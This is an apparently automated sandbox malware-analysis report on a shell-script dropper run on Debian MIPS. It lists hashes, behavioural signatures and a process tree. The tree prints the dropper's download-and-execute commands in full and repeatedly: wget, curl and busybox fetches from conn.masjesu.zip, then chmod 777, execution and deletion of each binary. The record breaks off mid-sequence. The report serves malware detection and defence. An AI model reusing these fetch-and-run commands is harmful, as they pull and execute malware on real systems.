Analysis
-
max time kernel
109s -
max time network
111s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 03:08
Static task
static1
Behavioral task
behavioral1
Sample
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh
-
Size
10KB
-
MD5
37856104cd3244a99074cb343eac4703
-
SHA1
067e09ba3ab17bad4bec316fe86b6d0555be2e31
-
SHA256
f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2
-
SHA512
64e778d30cc82f4e4a6e9665a5a48168a3d8b0fa03b309a9d3623444b35b8240ce213d33cf62e6e3347a8e241746106a11e57180ade70d093b4ea67103154b9b
-
SSDEEP
192:QPLoN9Iz2SdM0DrmLj/+JJzzXkYkBiyYPLoN9E2SdM05YkBiyHj/+JJBd:QPLoN9Iz2SdM0DrmUzX1PLoN9E2SdM04
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 859 chmod 915 chmod 964 chmod 985 chmod 852 chmod 978 chmod 1013 chmod 845 chmod 866 chmod 894 chmod 936 chmod 950 chmod 957 chmod 1006 chmod 999 chmod 798 chmod 880 chmod 901 chmod 971 chmod 992 chmod 1020 chmod 835 chmod 873 chmod 922 chmod 943 chmod 887 chmod 908 chmod 929 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL 799 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK 836 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB 846 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I 853 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O 860 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ 867 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S 874 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv 881 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp 888 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 895 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 902 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw 909 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn 916 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A 923 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL 930 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK 937 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB 944 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I 951 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O 958 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ 965 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S 972 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A 979 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv 986 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp 993 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 1000 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 1007 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw 1014 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn 1021 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 849 curl 996 curl 1002 wget 1017 curl 1012 busybox 858 busybox 905 curl 907 busybox 953 wget 960 wget 977 busybox 856 curl 865 busybox 877 curl 935 busybox 946 wget 1019 busybox 802 curl 841 busybox 900 busybox 933 curl 949 busybox 855 wget 862 wget 893 busybox 898 curl 897 wget 932 wget 998 busybox 1005 busybox 1016 wget 848 wget 879 busybox 926 curl 974 wget 991 busybox 801 wget 876 wget 912 curl 883 wget 914 busybox 928 busybox 984 busybox 956 busybox 961 curl 988 wget 863 curl 884 curl 886 busybox 925 wget 947 curl 989 curl 995 wget 963 busybox 968 curl 728 wget 824 busybox 839 curl 891 curl 954 curl 970 busybox 869 wget 890 wget 904 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw curl File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 curl File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv curl File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 curl File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB curl File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A curl File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL curl File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S curl File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 curl File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn curl File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ curl File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp curl File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn curl File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A curl File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB curl File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O curl File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ curl File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv curl File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK curl File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw curl File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 curl File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK curl File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp curl File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL curl File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I curl File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S curl File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I curl File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O curl
Processes
-
/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh/tmp/f6fccd64179de7f1cd263b0a233e963dcb3bb01b70b1eec9385ae5571122d4d2.sh1⤵PID:720
-
/bin/rm/bin/rm bins.sh2⤵PID:724
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- System Network Configuration Discovery
PID:728
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:792
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:800
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- System Network Configuration Discovery
PID:801
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- System Network Configuration Discovery
PID:824
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:837
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:847
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:851
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:854
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- System Network Configuration Discovery
PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- System Network Configuration Discovery
PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:872
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:921
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:942
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- System Network Configuration Discovery
PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
